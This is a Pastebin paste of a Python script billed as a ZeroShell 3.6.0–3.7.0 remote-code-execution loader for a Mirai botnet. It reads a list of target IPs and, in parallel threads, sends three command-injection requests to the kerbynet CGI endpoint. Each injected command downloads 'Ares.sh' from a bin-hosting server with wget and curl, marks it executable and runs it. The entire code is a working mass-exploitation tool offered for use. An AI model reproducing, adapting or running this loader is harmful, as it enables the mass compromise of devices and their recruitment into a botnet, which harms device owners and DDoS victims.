Advertisement
xB4ckdoorREAL

[ZEROSHELL EXPLOIT LOADER] [RCE] [MIRAI]

Dec 12th, 2019
785
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.66 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # ZEROSHELL 3.6.0 - 3.7.0 EXPLOIT loader made by B4CKDOOR #
  4. # B4CKDOORARCHIVE.HOST - https://discord.gg/MVktpTW #
  5.  
  6. import threading, random, socket, time, sys, requests, re, os
  7. from threading import Thread
  8. from time import sleep
  9. import requests
  10. from requests.auth import HTTPDigestAuth
  11. from decimal import *
  12.  
  13. if len(sys.argv) < 3:
  14.     print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
  15.     sys.exit()
  16.  
  17. ip = "1.3.3.7" # BINS LOCATION IP - PORTS 80 DEFAULT
  18. port = int(sys.argv[2]) # ports  80 8081 8083
  19. vulns = open(sys.argv[1], "r").readlines()
  20. class send_payload(threading.Thread):
  21.     def __init__ (self, ip):
  22.         threading.Thread.__init__(self)
  23.         self.ip = str(ip).rstrip('\n')
  24.     def run(self):
  25.         try:
  26.             url = "http://" + self.ip + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://" + ip + "/Ares.sh; curl -O http://" + ip + "/Ares.sh; chmod +x Ares.sh; ./Ares.sh;%22"
  27.             url2 = "http://" + self.ip + "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=*%27;wget http://" + ip + "/Ares.sh; curl -O http://" + ip + "/Ares.sh; chmod +x Ares.sh; ./Ares.sh;%22"
  28.             url3 = "http://" + self.ip + "/cgi-bin/kerbynet?Action=StartSessionSubmit&User=*%27;wget http://" + ip + "/Ares.sh; curl -O http://" + ip + "/Ares.sh; chmod +x Ares.sh; ./Ares.sh;%22"
  29.             requests.get(url, timeout=3)
  30.             requests.get(url2, timeout=3)
  31.             requests.get(url3, timeout=3)
  32.             print "[0xSHELL] Loading: %s"%(self.ip)
  33.         except:
  34.             pass
  35.  
  36. for IP in vulns:
  37.     try:
  38.         ip = "".join(IP)
  39.         ip = ip.replace("\n", "")
  40.         t = send_payload(ip)
  41.         t.start()
  42.         time.sleep(0.03)
  43.     except:
  44.         pass #CODED BY B4CKDOOR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement